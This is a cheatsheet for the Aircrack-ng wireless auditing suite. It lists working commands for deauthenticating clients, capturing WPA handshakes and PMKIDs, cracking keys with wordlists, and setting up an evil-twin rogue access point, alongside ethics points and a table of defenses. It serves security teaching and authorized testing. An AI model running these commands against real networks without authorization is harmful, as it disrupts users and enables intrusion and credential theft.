The Ultimate Aircrack-ng Cheatsheet: A Comprehensive Guide to Wireless Network Security Assessment

Cheatsheets

Introduction

Aircrack-ng is a powerful suite of tools for auditing wireless network security. It includes tools for monitoring, attacking, testing, and cracking Wi-Fi 802.11 networks. This comprehensive cheatsheet provides a detailed reference for security professionals, network administrators, and cybersecurity students performing authorized wireless security assessments. Understanding these tools is essential both for securing your own networks and for identifying vulnerabilities during authorized penetration testing.

Core Concepts of Wireless Security Testing

Wi-Fi Security Protocols

  • WEP (Wired Equivalent Privacy): Outdated and vulnerable
  • WPA (Wi-Fi Protected Access): Improved security over WEP
  • WPA2 (Wi-Fi Protected Access II): Current standard with stronger encryption
  • WPA3 (Wi-Fi Protected Access III): Latest standard with enhanced security features
  • Enterprise vs. Personal: Different authentication mechanisms (RADIUS server vs. Pre-shared key)

Authentication Methods

  • Pre-Shared Key (PSK): Single password shared by all users
  • 802.1X/EAP: Enterprise authentication using individual credentials
  • SAE (Simultaneous Authentication of Equals): WPA3’s handshake method replacing 4-way handshake

Key Attack Vectors

  • Packet Capture & Analysis: Intercepting and examining wireless traffic
  • Deauthentication: Forcing clients to disconnect and reconnect
  • Handshake Capture: Obtaining encrypted authentication handshakes
  • Dictionary Attacks: Testing password lists against captured handshakes
  • PMKID Attacks: Targeting the Pairwise Master Key Identifier
  • Evil Twin: Creating rogue access points to capture credentials

Aircrack-ng Suite Components

Core Tools and Functions

ToolPurposePrimary Use Cases
aircrack-ngWEP/WPA/WPA2-PSK key crackingCracking captured handshakes, PTW attacks
airmon-ngWireless interface managementSetting up monitor mode
airodump-ngPacket captureDiscovering networks, capturing handshakes
aireplay-ngPacket injectionGenerating traffic, deauthentication
airbase-ngFake AP setupCreating rogue access points
airtun-ngVirtual tunnel interfaceCreating encrypted tunnels
packetforge-ngPacket creationGenerating custom wireless frames
wesside-ngAutomated WEP crackingAll-in-one WEP recovery
easside-ngCommunication captureTargeted client data capture
tkiptun-ngWPA/TKIP attacksTesting TKIP implementations
besside-ngAutomated WPA crackingTargeting multiple networks simultaneously

Supporting Tools

ToolPurpose
airdecap-ngDecrypt WEP/WPA/WPA2 capture files
airdecloak-ngRemove WEP cloaking to improve cracking
airolib-ngStore and manage ESSID and password lists
airserv-ngProvide remote access to wireless cards
buddy-ngHelper tool for easside-ng
ivstoolsManipulate IVS files
kstatsShow statistical FMS attack data
makeivs-ngGenerate initialization vectors
wpacleanClean captured WPA handshake files

Step-by-Step Wireless Assessment Process

Phase 1: Preparation

  1. Verify you have proper authorization to test the network
  2. Set up your testing environment (Kali Linux or similar)
  3. Confirm compatible wireless adapter with monitor mode & packet injection support
  4. Prepare wordlists for cracking if performing dictionary attacks
  5. Document target networks and testing objectives

Phase 2: Interface Setup

  1. Identify wireless interfaces

    sudo airmon-ng

  2. Kill interfering processes

    sudo airmon-ng check kill

  3. Set interface to monitor mode

    sudo airmon-ng start wlan0
# Result: monitor interface created (typically wlan0mon)

  4. Verify monitor mode

    sudo iwconfig

Phase 3: Network Discovery

  1. Scan for wireless networks

    sudo airodump-ng wlan0mon

  2. Focused scan on target network

    sudo airodump-ng -c [channel] --bssid [BSSID] -w [file prefix] wlan0mon

    Parameters:

    • -c [channel]: Specific channel to monitor
    • --bssid [BSSID]: Target access point MAC address
    • -w [file prefix]: Prefix for saved capture files

Phase 4: Capture Authentication Data

  1. WPA/WPA2 Handshake Capture:

    a. First, run airodump-ng focused on target

    sudo airodump-ng -c [channel] --bssid [BSSID] -w [capture file] wlan0mon

    b. In a new terminal, force deauthentication to trigger handshake

    sudo aireplay-ng -0 1 -a [BSSID] -c [client MAC] wlan0mon

    Parameters:

    • -0 1: Send 1 deauth packet (increase number for multiple packets)
    • -a [BSSID]: Target access point
    • -c [client MAC]: Target client (optional)

    c. Verify handshake capture (look for “WPA handshake: [BSSID]” in airodump-ng)

  2. PMKID Capture (No client needed):

    sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 --filterlist=[BSSID] --filtermode=2

  3. WEP Data Capture:

    sudo airodump-ng -c [channel] --bssid [BSSID] -w [capture file] wlan0mon

Phase 5: Traffic Generation (For WEP)

  1. Fake authentication with the access point

    sudo aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [your MAC] wlan0mon

  2. ARP request replay attack

    sudo aireplay-ng -3 -b [BSSID] -h [your MAC] wlan0mon

  3. Fragmentation attack

    sudo aireplay-ng -5 -b [BSSID] -h [your MAC] wlan0mon

Phase 6: Cracking Passwords

  1. WPA/WPA2 Handshake Cracking:

    sudo aircrack-ng -a2 -b [BSSID] -w [wordlist path] [capture file.cap]

    Parameters:

    • -a2: WPA/WPA2 cracking mode
    • -b [BSSID]: Target access point
    • -w [wordlist path]: Path to dictionary file

  2. PMKID Cracking:

    a. First, convert captured PMKID

    sudo hcxpcapngtool -o pmkid.hashes pmkid.pcapng

    b. Then crack

    sudo hashcat -m 16800 pmkid.hashes [wordlist path]

  3. WEP Cracking:

    sudo aircrack-ng -b [BSSID] [capture file.cap]

  4. Advanced WPA wordlist attack with rules:

    sudo aircrack-ng -a2 -b [BSSID] -w [wordlist path] -r [rule file] [capture file.cap]

Phase 7: Post-Exploitation Verification

  1. Decrypt captured packets

    sudo airdecap-ng -p [password] -e [ESSID] [capture file.cap]

  2. Connect to the network to verify access

  3. Document findings and recommendations

  4. Clean up temporary files

Advanced Techniques & Commands

Targeted BSSID & Client Deauthentication

  1. Deauthenticate all clients from specific AP

    sudo aireplay-ng -0 0 -a [BSSID] wlan0mon

  2. Deauthenticate specific client

    sudo aireplay-ng -0 0 -a [BSSID] -c [client MAC] wlan0mon

  3. Deauthenticate multiple networks using a list

    sudo mdk4 wlan0mon d -b blacklist.txt

Evil Twin Attack Setup

  1. Setup fake AP

    sudo airbase-ng -e [Target ESSID] -c [channel] wlan0mon

  2. Configure routing & DHCP

    sudo ifconfig at0 up 192.168.1.1 netmask 255.255.255.0
sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

  3. Setup DHCP server

    sudo dnsmasq -C dnsmasq.conf -d

  4. Enable routing

    sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Passive Handshake Collection

sudo airodump-ng -c [channel range] --bssid [BSSID] -w captures wlan0mon

Advanced WEP Cracking

  1. Korek ChopChop attack

    sudo aireplay-ng -4 -b [BSSID] -h [your MAC] wlan0mon

  2. Caffe Latte attack (client-side WEP)

    sudo aireplay-ng -6 -b [BSSID] -h [your MAC] wlan0mon

  3. Hirte attack (client-side WEP)

    sudo aireplay-ng -7 -b [BSSID] -h [your MAC] wlan0mon

Common Challenges & Solutions

Hardware Issues

IssueSolution
Monitor mode not workingCheck driver compatibility, try different kernel
Packet injection failingRun sudo aireplay-ng -9 wlan0mon to test
Weak signalUse directional antenna, adjust positioning
USB adapter disconnectsUse powered USB hub, check overheating

Software/Attack Issues

IssueSolution
No handshake capturedTry targeted deauth with visible clients, wait longer
WPA handshake not verifiedCheck for “WPA handshake” message in airodump-ng
Slow cracking performanceUse GPU acceleration, optimize wordlist
Crowded Wi-Fi channelsTarget networks on less congested channels

Best Practices for Wi-Fi Security Assessment

Testing Ethics & Legal Considerations

  • Always obtain explicit permission before testing
  • Document scope and authorization in writing
  • Avoid disrupting production networks
  • Protect captured data according to client’s security policies
  • Stay within defined scope boundaries

Efficient Password Cracking

  • Start with targeted wordlists relevant to the organization
  • Use rule-based attacks for common password patterns
  • Implement mask attacks for known password policies
  • Utilize GPU acceleration when available
  • Consider distributed cracking for complex passwords

Documentation & Reporting

  • Capture detailed evidence of vulnerabilities
  • Document each step of the assessment process
  • Include actionable recommendations for remediation
  • Classify findings by severity and impact
  • Provide executive summary for non-technical stakeholders

Attack Mitigation Techniques

Attack MethodRecommended Defense
WEP CrackingUpgrade to WPA2/WPA3
Handshake CaptureUse strong, complex passwords (12+ chars)
Evil TwinImplement 802.1X with server certificate validation
DeauthenticationEnable Protected Management Frames (PMF)
Dictionary AttacksEnforce strong password policy
PMKID AttacksUse WPA Enterprise or WPA3

Comparison of Wi-Fi Security Standards

FeatureWEPWPAWPA2WPA3
EncryptionRC4 (weak)TKIP/RC4CCMP/AESGCMP-256
Key Length64/128-bit128-bit128-bit192-bit
Vulnerability to Aircrack-ngHighly vulnerableModerately vulnerableVulnerable with weak passwordResistant to basic attacks
AuthenticationShared KeyPSK or 802.1XPSK or 802.1XSAE or 802.1X
Common Attack VectorsIV collisions, statisticalTKIP MIC attacks, DictionaryDictionary, PMKIDSide-channel attacks
Aircrack-ng Attack TimeMinutesHours to DaysHours to DaysDays to Impractical

Resources for Further Learning

Official Documentation

Books & Publications

  • “Penetration Testing: A Hands-On Introduction to Hacking”
  • “Kali Linux Wireless Penetration Testing Beginner’s Guide”
  • “BackTrack 5 Wireless Penetration Testing”
  • “Hacking Exposed Wireless”

Online Courses & Training

  • Offensive Security Wireless Attacks (WiFu)
  • SANS SEC617: Wireless Penetration Testing and Ethical Hacking
  • Pentester Academy – WiFi Security and Pentesting
  • Udemy and Coursera wireless security courses

Communities & Forums

  • Aircrack-ng Forums
  • Kali Linux Forums
  • HackForums Wireless Security Section
  • Reddit r/HowToHack and r/AskNetSec

Quick Tips for Effective Wireless Assessment

  • Use high-quality wireless adapters with Atheros or Realtek chipsets
  • Test during off-hours to minimize network disruption
  • Create a dedicated testing environment separate from production
  • Maintain a collection of proven wordlists for different scenarios
  • Keep tools and drivers updated for best compatibility
  • Use Kali Linux for a comprehensive toolkit pre-installed
  • Consider multiple antennas for better coverage in large environments
  • Document your methodology for consistent and repeatable testing
  • Always clean up captured files containing sensitive information
  • Stay updated on new wireless security vulnerabilities and techniques

Related Posts

Subscribe
Subscribe
Scroll to Top